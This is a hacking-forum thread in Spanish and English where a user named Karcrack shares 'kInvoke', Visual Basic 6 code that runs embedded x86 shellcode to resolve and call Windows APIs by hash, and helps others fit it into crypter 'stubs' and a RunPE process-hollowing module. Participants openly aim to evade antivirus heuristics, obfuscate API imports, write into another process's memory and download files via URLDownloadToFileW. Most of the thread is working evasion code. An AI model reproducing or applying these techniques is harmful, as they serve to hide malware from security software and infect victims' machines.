Existen gran cantidad de códigos por la red (algunos míos :rolleyes:) que permiten llamar APIs de forma Dinámica... es decir sin declararlas...
Que tiene este de especial? Que las llama mediante un Hash... Tal y como hacen los Shellcodes ;-)
Aquí un ejemplo de llamada:
Call Invoke("USER32", &HBC4DA2BE, 0, StrPtr("Soy Karcrack :D"), StrPtr("Ejemplo"), 0)
&HBC4DA2BE es el Hash de la cadena "MessageBoxW", para generar los Hashes se utiliza el siguiente algoritmo:
;ESI = Puntero cadena
compute_hash:
xor edi, edi ;EDI = 0
xor eax, eax ;EAX = 0
cld
compute_hash_again:
lodsb ;AL = BYTE[ESI] , ESI = ESI + 1
test al, al
jz compute_hash_finished
ror edi, 0xD
add edi, eax
jmp compute_hash_again
compute_hash_finished:
;EDI = El Hash de la cadena
De todas formas he hecho una pequeña herramienta para que genera los Hashes :D
Citar(http://img136.imageshack.us/img136/4060/dibujonu.jpg)
http://www.box.net/shared/0ld4yy6bmy
Codigo Fuente incluido ;)
Bueno, aquí esta el código principal:
'---------------------------------------------------------------------------------------
' Module : kInvoke
' Author : Karcrack
' Date : 09/04/2010
' Purpose : Call APIs By Hash
'---------------------------------------------------------------------------------------
Option Explicit
'USER32
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
Private Const THUNK_GETAPIPTR As String = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF74240850E83000000083C408C3565531C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC35552515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A2001EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"
Private Const THUNK_CALLCODE As String = "<PUSHES>B8<API_PTR>FFD0C3"
Private ASM_GETAPIPTR(0 To 170) As Byte
Private ASM_CALLCODE(0 To 255) As Byte
Public Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
Dim vItem As Variant
Dim lAPI As Long
Dim sThunk As String
Call PutThunk(THUNK_GETAPIPTR, ASM_GETAPIPTR)
lAPI = CallWindowProcW(VarPtr(ASM_GETAPIPTR(0)), StrPtr(sDLL), hHash)
If lAPI Then
For Each vItem In vParams
sThunk = "68" & GetLng(CLng(vItem)) & sThunk
Next vItem
sThunk = Replace$(Replace$(THUNK_CALLCODE, "<PUSHES>", sThunk), "<API_PTR>", GetLng(lAPI))
Call PutThunk(sThunk, ASM_CALLCODE)
Invoke = CallWindowProcW(VarPtr(ASM_CALLCODE(0)))
Else
Invoke = -1
Err.Raise -1, , "Bad Hash or wrong DLL"
End If
End Function
Private Function GetLng(ByVal lLng As Long) As String
Dim lTMP As Long
lTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D Sutton
If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
GetLng = String$(8 - Len(Hex$(lTMP)), "0") & Hex$(lTMP)
End Function
Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)
Dim i As Long
For i = 0 To Len(sThunk) - 1 Step 2
bvRet((i / 2)) = CByte("&H" & Mid$(sThunk, i + 1, 2))
Next i
End Sub
Aquí tenéis el código de ejemplo con todos los códigos de ASM utilizados :D:http://www.box.net/shared/qgzqkoc4nn
Cualquier duda preguntad ;)
Saludos ;D
Bien hecho ;-).
Saludos
Sorprendido...! Vaya karcrack, muy buenos tus aportes...!
Cita de: Karcrack en 9 Abril 2010, 16:17 PM
Existen gran cantidad de códigos por la red (algunos míos :rolleyes:) que permiten llamar APIs de forma Dinámica... es decir sin declararlas...
Que modesto nos salio... JAAAaajajaja!¡.
lo de hash y ASM recuerdo que me lo menciono mi primo que ya tiene 30 y pico de años... jamas le entendi ni jota... me lo decia en su lenguaje... ASM!¡.
Este tipo de cosillas se queman muuy rapido, pero bueno!¡.
Dulces Lunas!¡.
Muy bueno Kar, che hay una duda con esto del callApi que me carcome no pude lograr nunca pasar estas funciones, vos que la tenes mas clara capas que las sacas.
Option Explicit
Private Declare Function RtlGetCompressionWorkSpaceSize Lib "NTDLL" (ByVal flags As Integer, WorkSpaceSize As Long, UNKNOWN_PARAMETER As Long) As Long
Private Declare Function NtAllocateVirtualMemory Lib "ntdll.dll" (ByVal ProcHandle As Long, BaseAddress As Long, ByVal NumBits As Long, regionsize As Long, ByVal flags As Long, ByVal ProtectMode As Long) As Long
Private Declare Function RtlCompressBuffer Lib "NTDLL" (ByVal flags As Integer, ByVal BuffUnCompressed As Long, ByVal UnCompSize As Long, ByVal BuffCompressed As Long, ByVal CompBuffSize As Long, ByVal UNKNOWN_PARAMETER As Long, OutputSize As Long, ByVal WorkSpace As Long) As Long
Private Declare Function RtlDecompressBuffer Lib "NTDLL" (ByVal flags As Integer, ByVal BuffUnCompressed As Long, ByVal UnCompSize As Long, ByVal BuffCompressed As Long, ByVal CompBuffSize As Long, OutputSize As Long) As Long
Private Declare Function NtFreeVirtualMemory Lib "ntdll.dll" (ByVal ProcHandle As Long, BaseAddress As Long, regionsize As Long, ByVal flags As Long) As Long
Public Function Compress(Data() As Byte, Out() As Byte) As Long
Dim WorkSpaceSize As Long
Dim WorkSpace As Long
ReDim Out(UBound(Data) * 1.13 + 4)
RtlGetCompressionWorkSpaceSize 2, WorkSpaceSize, 0
NtAllocateVirtualMemory -1, WorkSpace, 0, WorkSpaceSize, 4096, 64
RtlCompressBuffer 2, VarPtr(Data(0)), UBound(Data) + 1, VarPtr(Out(0)), (UBound(Data) * 1.13 + 4), 0, Compress, WorkSpace
NtFreeVirtualMemory -1, WorkSpace, 0, 16384
ReDim Preserve Out(Compress)
End Function
Public Function DeCompress(Data() As Byte, dest() As Byte) As Long
If UBound(Data) Then
Dim lBufferSize As Long
ReDim dest(UBound(Data) * 12.5)
RtlDecompressBuffer 2, VarPtr(dest(0)), (UBound(Data) * 12.5), VarPtr(Data(0)), UBound(Data), lBufferSize
If lBufferSize Then
ReDim Preserve dest(lBufferSize - 1)
DeCompress = lBufferSize - 1
End If
End If
End Function
Saludos.
Simplemente hay que tener en cuenta que todos los parámetros se pasaran tal cual es el Long... osea, hacerlo como si fuese todo ByVal
Aqui lo tienes modificado :D:
Option Explicit
Private Const sDLL As String = "NTDLL"
Public Function Compress(Data() As Byte, Out() As Byte) As Long
Dim WorkSpaceSize As Long
Dim WorkSpace As Long
ReDim Out(UBound(Data) * 1.13 + 4)
' v--RtlGetCompressionWorkSpaceSize
Invoke sDLL, &HA7DA59A7, 2, VarPtr(WorkSpaceSize), VarPtr(0)
' v--NtAllocateVirtualMemory
Invoke sDLL, &HD33BCABD, -1, VarPtr(WorkSpace), 0, VarPtr(WorkSpaceSize), 4096, 64
' v--RtlCompressBuffer
Invoke sDLL, &HD8ACBF8E, 2, VarPtr(Data(0)), UBound(Data) + 1, VarPtr(Out(0)), (UBound(Data) * 1.13 + 4), 0, VarPtr(Compress), WorkSpace
' v--NtFreeVirtualMemory
Invoke sDLL, &HDB63B5AB, -1, VarPtr(WorkSpace), VarPtr(0), 16384
ReDim Preserve Out(Compress)
End Function
Public Function DeCompress(Data() As Byte, dest() As Byte) As Long
If UBound(Data) Then
Dim lBufferSize As Long
ReDim dest(UBound(Data) * 12.5)
' v--RtlDecompressBuffer
Invoke sDLL, &HFD46A728, 2, VarPtr(dest(0)), (UBound(Data) * 12.5), VarPtr(Data(0)), UBound(Data), VarPtr(lBufferSize)
If lBufferSize Then
ReDim Preserve dest(lBufferSize - 1)
DeCompress = lBufferSize - 1
End If
End If
End Function
En resumen, solo hay que tener en cuenta si en la declaracion del API que estas llamando de forma dinamica un parametro tiene ByRef o bien no tiene ByVal, en este caso se utilizará VarPtr() :D
Luego estan las cadenas, que es recomendable trabajar con las variantes UNICODE de las APIs, y enviar el puntero usando StrPtr() siempre se puede pasar la cadena a ANSI y punto... pero es mas trabajo ;)
muy bien :D, habia echo un monton de pruebas y me explotaba el vb, seguramente devia estar pasando mal algun valor con byval, y para los long no usaba varptr.
Gracias. y te felicito nuevamente.
Buen trabajo, no termina una sorpresa. Yo estaba tratando de usarlo con tu forma sin éxito. ¿Me puede ayudar por favor?
Option Explicit
'---------------------------------------------------------------------------------------
' Module : mAPIObfuscation
' Author : Karcrack
' Now$ : 29/08/2009 13:54
' Used for? : Obfuscate API Declaration
'---------------------------------------------------------------------------------------
'MSVBVM60
Private Declare Sub CopyBytes Lib "MSVBVM60" Alias "__vbaCopyBytes" (ByVal Size As Long, Dest As Any, Source As Any)
'KERNEL32
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByRef lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByRef lpNumberOfBytesWritten As Long) As Long
Private Declare Function IsBadReadPtr Lib "KERNEL32" (ByRef lp As Any, ByVal ucb As Long) As Long
Public Function DeObfuscateAPI(ByVal sLib As String, ByVal sFunc As String) As Boolean
Dim lAddr As Long
Dim sBuff As String * &H200
Dim lLib As Long
Dim lFunc As Long
If App.LogMode = 0 Then GoTo OUT
lAddr = App.hInstance& - Len(sBuff)
Do
lAddr = lAddr + Len(sBuff)
If IsBadReadPtr(ByVal lAddr, Len(sBuff)) <> 0 Then GoTo OUT
Call CopyBytes(Len(sBuff), ByVal sBuff$, ByVal lAddr&)
lLib = InStr(1, sBuff, sLib, vbBinaryCompare)
lFunc = InStr(1, sBuff, sFunc, vbBinaryCompare)
Loop Until (lLib <> 0) And (lFunc <> 0)
lLib = lAddr + lLib - 1
lFunc = lAddr + lFunc - 1
If WriteProcessMemory(-1, ByVal lLib&, ByVal E(sLib), Len(sLib), ByVal 0&) = 0 Then GoTo OUT
If WriteProcessMemory(-1, ByVal lFunc&, ByVal E(sFunc), Len(sFunc), ByVal 0&) = 0 Then GoTo OUT
DeObfuscateAPI = True: Exit Function
OUT:
DeObfuscateAPI = False: Exit Function
End Function
No entiendo cómo pasar punteros
Public Function DeObfuscateAPI(ByVal sLib As String, ByVal sFunc As String) As Boolean
Dim lAddr As Long
Dim sBuff As String * &H200
Dim lLib As Long
Dim lFunc As Long
If App.LogMode = 0 Then GoTo OUT
lAddr = App.hInstance& - Len(sBuff)
Do
lAddr = lAddr + Len(sBuff)
If Invoke("KERNEL32", &H6E824142, ByVal lAddr, Len(sBuff)) <> 0 Then GoTo OUT
Call Invoke("MSVBVM60", &H6A5B5999, Len(sBuff), ByVal sBuff$, ByVal lAddr&)
lLib = InStr(1, sBuff, sLib, vbBinaryCompare)
lFunc = InStr(1, sBuff, sFunc, vbBinaryCompare)
Loop Until (lLib <> 0) And (lFunc <> 0)
lLib = lAddr + lLib - 1
lFunc = lAddr + lFunc - 1
If Invoke("KERNEL32", &HD83D6AA1, -1, ByVal lLib&, ByVal E(sLib), Len(sLib), ByVal 0&) = 0 Then GoTo OUT
If Invoke("KERNEL32", &HD83D6AA1, -1, ByVal lFunc&, ByVal E(sFunc), Len(sFunc), ByVal 0&) = 0 Then GoTo OUT
DeObfuscateAPI = True: Exit Function
OUT:
DeObfuscateAPI = False: Exit Function
End Function
@tr1n1t1: Estas muy confundido, ese codigo que has pegado, es para otro porposito, ese codigo cifra la declaracion habitual de un API en VB, en cambio con el kInvoke se llama al API sin tener que usar ese declaracion.
Thanks for your answer karcrack, I know that, I'm just trying to create a module to obfuscate apis that uses only CallWindowProcW merging your codes. I need that because I'm not being able to use Invoke on this line:
sMSVBVM60 = "MSVBVM60.DLL"
Do While i < tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
--->Invoke sMSVBVM60, &H6A5B5999, Len(tIMAGE_SECTION_HEADER), VarPtr(tIMAGE_SECTION_HEADER), VarPtr(bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i))
Invoke sNTDLL, &HC5108CC2, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
i = i + 1
Loop
Como se puede ver soy tu admirador ;D
Okey, I got you ;)
You must check API declaration like this one:
Private Declare Sub CopyBytes Lib "MSVBVM60" Alias "__vbaCopyBytes" (ByVal Size As Long, Dest As Any, Source As Any)
Then you look each parameter, if the parametar hasn't ByVal or has ByRef VB6 will pass the pointer to the APIs, to sum up, if there isn't ByVal or there's ByRef you must use VarPtr(). You must be carefull with Strings and use StrPtr(), sometimes you'll need to convert UNICODE to ANSI...
I've fixed the code, it must work now:
Public Function DeObfuscateAPI(ByVal sLib As String, ByVal sFunc As String) As Boolean
Dim lAddr As Long
Dim sBuff As String * &H200
Dim lLib As Long
Dim lFunc As Long
If App.LogMode = 0 Then GoTo OUT
lAddr = App.hInstance& - Len(sBuff)
Do
lAddr = lAddr + Len(sBuff)
If Invoke("KERNEL32", &H6E824142, ByVal lAddr, Len(sBuff)) <> 0 Then GoTo OUT
Call Invoke("MSVBVM60", &H6A5B5999, Len(sBuff), ByVal StrPtr(sBuff), ByVal lAddr&)
lLib = InStr(1, sBuff, sLib, vbBinaryCompare)
lFunc = InStr(1, sBuff, sFunc, vbBinaryCompare)
Loop Until (lLib <> 0) And (lFunc <> 0)
lLib = lAddr + lLib - 1
lFunc = lAddr + lFunc - 1
dim bvTmp() as byte
bvTmp = StrConv(E(sLib),vbFromUnicode)
If Invoke("KERNEL32", &HD83D6AA1, -1, ByVal lLib&, ByVal varptr(bvTmp(0)), Len(sLib), ByVal 0&) = 0 Then GoTo OUT
bvTmp = StrConv(E(sFunc),vbFromUnicode)
If Invoke("KERNEL32", &HD83D6AA1, -1, ByVal lFunc&, ByVal varptr(bvTmp(0)), Len(sFunc), ByVal 0&) = 0 Then GoTo OUT
DeObfuscateAPI = True: Exit Function
OUT:
DeObfuscateAPI = False: Exit Function
End Function
I've noticed that VB has a weird error with VarPtr() and Calling Funcs/APIs... looks like depending place you call it returns differents things :-\ I'm quite confused :-\ Anyway i think i've found the way of bypassing that... i will post it later
EDIT: After few hours debugging i've noticed that the problem can be solved replacing Strings in Types by Byte Arrays :)
Indeed I get a type mismatch error on the ByVal in this line
If Invoke("KERNEL32", &H6E824142, ByVal lAddr, Len(sBuff)) <> 0 Then GoTo OUT
Hope you can help me to fix it :)
Try this way dude:
]If Invoke("KERNEL32", &H6E824142, lAddr, Len(sBuff)) <> 0 Then GoTo OUT
Make sure lAddr is long ;)
Cita de: Karcrack en 12 Abril 2010, 15:46 PM
Try this way dude:
]If Invoke("KERNEL32", &H6E824142, lAddr, Len(sBuff)) <> 0 Then GoTo OUT
Make sure lAddr is long ;)
If I change just this line it works ;D , too bad that I get Type mismatch on every
ByVal, so I removed them all but it won't work anymore, I think the problem is on lLib&,lAddr&,lFunc& because I tried changing one line at time and it won't work for CopyBytes and Writeprocessmemory, but not sure. Anyway this line is totally right and working.
If Invoke("KERNEL32", &H6E824142, lAddr, Len(sBuff)) <> 0 Then GoTo OUT
He hecho una pequeña actualizacion para un nuevo modulo RunPe en el que estoy trabajando, asi que aqui esta:
'Karcrack , 22/07/10
Option Explicit
Private Type DWORD_L
D1 As Long
End Type
Private Type DWORD_B
B1 As Byte: B2 As Byte: B3 As Byte: B4 As Byte
End Type
'USER32
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
Private bInitialized_Inv As Boolean
Private ASM_gAPIPTR(0 To 170) As Byte
Private ASM_cCODE(0 To 255) As Byte
Private Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
Dim vItem As Variant
Dim bsTmp As DWORD_B
Dim lAPI As Long
Dim i As Long
Dim w As Long
If Not bInitialized_Inv Then
For Each vItem In Array(&HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
&H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
ASM_gAPIPTR(i) = CByte(vItem)
i = i + 1
Next vItem
i = 0
bInitialized_Inv = True
End If
lAPI = CallWindowProcW(VarPtr(ASM_gAPIPTR(0)), StrPtr(sDLL), hHash)
If lAPI Then
For w = UBound(vParams) To LBound(vParams) Step -1
vItem = vParams(w)
bsTmp = SliceLong(CLng(vItem))
'// PUSH ADDR
ASM_cCODE(i) = &H68: i = i + 1
ASM_cCODE(i) = bsTmp.B1: i = i + 1
ASM_cCODE(i) = bsTmp.B2: i = i + 1
ASM_cCODE(i) = bsTmp.B3: i = i + 1
ASM_cCODE(i) = bsTmp.B4: i = i + 1
Next w
bsTmp = SliceLong(lAPI)
'// MOV EAX, ADDR
ASM_cCODE(i) = &HB8: i = i + 1
ASM_cCODE(i) = bsTmp.B1: i = i + 1
ASM_cCODE(i) = bsTmp.B2: i = i + 1
ASM_cCODE(i) = bsTmp.B3: i = i + 1
ASM_cCODE(i) = bsTmp.B4: i = i + 1
'// CALL EAX
ASM_cCODE(i) = &HFF: i = i + 1
ASM_cCODE(i) = &HD0: i = i + 1
'// RET
ASM_cCODE(i) = &HC3: i = i + 1
Invoke = CallWindowProcW(VarPtr(ASM_cCODE(0)))
Else
Invoke = -1
'Err.Raise -1, , "Bad Hash or wrong DLL"
End If
End Function
Private Function SliceLong(ByVal lLong As Long) As DWORD_B
Dim tL As DWORD_L
tL.D1 = lLong
LSet SliceLong = tL
End Function
Saludos ;)
Hi Karcrack.
Thx for kInvoke.
Everything runs fine in the code except the commentet Invoke Calls.
Maybe you know what im doing wrong?
Option Explicit
Private Declare Function CryptEncrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long, ByVal dwBufLen As Long) As Long
Private Declare Function CryptDecrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long) As Long
Private Declare Function CryptHashData Lib "advapi32.dll" (ByVal hHash As Long, ByVal pbData As String, ByVal dwDataLen As Long, ByVal dwFlags As Long) As Long
Private Const PROV_RSA_AES As Long = 24
Private Const CRYPT_NEWKEYSET As Long = 8
Private Const CALG_AES_256 As Long = 26128
Private Const CALG_SHA_512 As Long = 32782
Private Const CRYPT_CREATE_SALT As Long = &H4
Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Private Const sAdvapi As String = "advapi32.dll"
Private Const sKernel As String = "kernel32.dll"
Public Function EnDecodeAES(ByVal sData As String, ByVal sPassword As String, ByVal bEncrypt As Boolean) As String
Dim hHash As Long
Dim hKey As Long
Dim hCryptProv As Long
Dim lData As Long
Dim sGetServiceProvider As String
Dim OS As OSVERSIONINFO
OS.dwOSVersionInfoSize = Len(OS)
Call Invoke(sKernel, &HC75FC483, VarPtr(OS))
If OS.dwMajorVersion & OS.dwMinorVersion >= 60 Then
sGetServiceProvider = "Microsoft Enhanced RSA and AES Cryptographic Provider"
Else
sGetServiceProvider = "Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)"
End If
Call Invoke(sAdvapi, &H43C28BF0, VarPtr(hCryptProv), 0, StrPtr(sGetServiceProvider), PROV_RSA_AES, CRYPT_NEWKEYSET)
Call Invoke(sAdvapi, &H43C28BF0, VarPtr(hCryptProv), 0, StrPtr(sGetServiceProvider), PROV_RSA_AES, 0&)
Call Invoke(sAdvapi, &H4105A130, hCryptProv, CALG_SHA_512, 0, 0, VarPtr(hHash))
'Private Declare Function CryptHashData Lib "advapi32.dll" (ByVal hHash As Long, ByVal pbData As String, ByVal dwDataLen As Long, ByVal dwFlags As Long) As Long
'Call Invoke(sAdvapi, &HC2122629, hHash, sPassword, Len(sPassword), 0)
' without Invoke
Call CryptHashData(hHash, sPassword, Len(sPassword), 0)
Call Invoke(sAdvapi, &HC2122629, hHash, StrPtr(sPassword), Len(sPassword), 0)
Call Invoke(sAdvapi, &HB56D274A, hCryptProv, CALG_AES_256, hHash, CRYPT_CREATE_SALT, VarPtr(hKey))
lData = Len(sData)
If bEncrypt Then
sData = sData & Space(16)
'Private Declare Function CryptEncrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long, ByVal dwBufLen As Long) As Long
'Call Invoke(sAdvapi, &HD9242588, hKey, 0, 1, 0, sData, VarPtr(lData), Len(sData))
' without Invoke
Call CryptEncrypt(hKey, 0, 1, 0, sData, lData, Len(sData))
Else
'Private Declare Function CryptDecrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long) As Long
'Call Invoke(sAdvapi, &H59202584, hKey, 0, 1, 0, sData, VarPtr(lData))
' without Invoke
Call CryptDecrypt(hKey, 0, 1, 0, sData, lData)
End If
EnDecodeAES = Left(sData, lData)
Call Invoke(sAdvapi, &H25D4AE7A, hHash)
Call Invoke(sAdvapi, &H95E24580, hKey)
Call Invoke(sAdvapi, &H5AE8E894, hCryptProv, 0)
End Function
I'd like to see the working code without Invoke, so I'll be able to see if you pass some pointers wrong..
Porque visual basic me odia? Eh?
Quise ver si hacia magia con la deteccion por euristica de los AV y... NO ME ANDA :-( :-(
Call Invoke("urlmon", &H702F1A36, 0, StrPtr("http://d.imagehost.org/0187/Tron-Evolution-cover_1.jpg"), StrPtr("C:\Tron.jpg"), 0, 0)
Este es un codigo "bobo" con la UrLmon de URLTODOWNLOADFILE que baja una imagen al disco para probar.
Pero no baja la imagen ni me muestra ningun error ni nada.
En que le erre :S?
Comprueba que estes llamando a la version unicode del API... URLDownloadToFileW@URLMON...
La explicacion de porque hay que llamar a las versiones unicode de las APIs es porque al usar StrPtr() sacas el puntero a la cadena en formato unicode... si quisieses por alguna razon usar la version ascii deberias hacer la conversion manualmente por ejemplo con bvByteArray = StrConv(sCADENA, vbFromUnicode)
Un saludo ;)
Cita de: Karcrack en 22 Julio 2010, 18:53 PM
He hecho una pequeña actualizacion para un nuevo modulo RunPe en el que estoy trabajando, asi que aqui esta:
'Karcrack , 22/07/10
Option Explicit
Private Type DWORD_L
D1 As Long
End Type
Private Type DWORD_B
B1 As Byte: B2 As Byte: B3 As Byte: B4 As Byte
End Type
'USER32
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
Private bInitialized_Inv As Boolean
Private ASM_gAPIPTR(0 To 170) As Byte
Private ASM_cCODE(0 To 255) As Byte
Private Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
Dim vItem As Variant
Dim bsTmp As DWORD_B
Dim lAPI As Long
Dim i As Long
Dim w As Long
If Not bInitialized_Inv Then
For Each vItem In Array(&HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
&H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
ASM_gAPIPTR(i) = CByte(vItem)
i = i + 1
Next vItem
i = 0
bInitialized_Inv = True
End If
lAPI = CallWindowProcW(VarPtr(ASM_gAPIPTR(0)), StrPtr(sDLL), hHash)
If lAPI Then
For w = UBound(vParams) To LBound(vParams) Step -1
vItem = vParams(w)
bsTmp = SliceLong(CLng(vItem))
'// PUSH ADDR
ASM_cCODE(i) = &H68: i = i + 1
ASM_cCODE(i) = bsTmp.B1: i = i + 1
ASM_cCODE(i) = bsTmp.B2: i = i + 1
ASM_cCODE(i) = bsTmp.B3: i = i + 1
ASM_cCODE(i) = bsTmp.B4: i = i + 1
Next w
bsTmp = SliceLong(lAPI)
'// MOV EAX, ADDR
ASM_cCODE(i) = &HB8: i = i + 1
ASM_cCODE(i) = bsTmp.B1: i = i + 1
ASM_cCODE(i) = bsTmp.B2: i = i + 1
ASM_cCODE(i) = bsTmp.B3: i = i + 1
ASM_cCODE(i) = bsTmp.B4: i = i + 1
'// CALL EAX
ASM_cCODE(i) = &HFF: i = i + 1
ASM_cCODE(i) = &HD0: i = i + 1
'// RET
ASM_cCODE(i) = &HC3: i = i + 1
Invoke = CallWindowProcW(VarPtr(ASM_cCODE(0)))
Else
Invoke = -1
'Err.Raise -1, , "Bad Hash or wrong DLL"
End If
End Function
Private Function SliceLong(ByVal lLong As Long) As DWORD_B
Dim tL As DWORD_L
tL.D1 = lLong
LSet SliceLong = tL
End Function
Saludos ;)
Thanks a lot for that code Karcrack, I tried to replace my call api by name by this one, I converted all api names to hash but then my stub gets broken. Is there anything else that has to be done?
Well, if you're taking the Hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...
Make sure you're generating the hashes using the complete function name... p.e MessageBoxA
Cita de: Karcrack en 1 Noviembre 2011, 03:49 AM
Well, if you're taking the Hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...
Make sure you're generating the hashes using the complete function name... p.e MessageBoxA
I've generated the hashes correctly using each complete function name, I used the tool you shared with us.
I'm on Windows 7 x64 bits and I'm compiling in Native Code
I never got the CallAPIByHash working, never understood why :/
My Stub was using CallAPIByName and it was working...
On 64bits maybe the hash would be different, check this with a Debugger or make a program to create Hashes automatically
Cita de: [L]ord [R]NA en 1 Noviembre 2011, 16:09 PM
On 64bits maybe the hash would be different, check this with a Debugger or make a program to create Hashes automatically
I have no idea on how to do this... Could you help me doing this please?
The hashes are the same... Can you post the code your using? Maybe the problem is with DEP...
Cita de: Karcrack en 1 Noviembre 2011, 19:01 PM
The hashes are the same... Can you post the code your using? Maybe the problem is with DEP...
I don't know with which API's it's not working, how do I know? I have Invoked RunPE/Resource and a few APIs in Main:
Main Module:
'fCallAPI ("KERNEL32"), ("RtlMoveMemory"), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile) ---> fCallAPI ("KERNEL32"), (&HCF14E85B), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile)
'fCallAPI "kernel32", "GetModuleFileNameW", 0, VarPtr(bBuff(0)), 1024 ---> fCallAPI "kernel32", &h45B06D8C, 0, VarPtr(bBuff(0)), 1024
Resource Module:
'hRsrc = fCallAPI(("Kernel32"), ("FindResourceW"), hMod, ResName, ResType) ---> hRsrc = fCallAPI(("Kernel32"), (&h3BD09A6B), hMod, ResName, ResType)
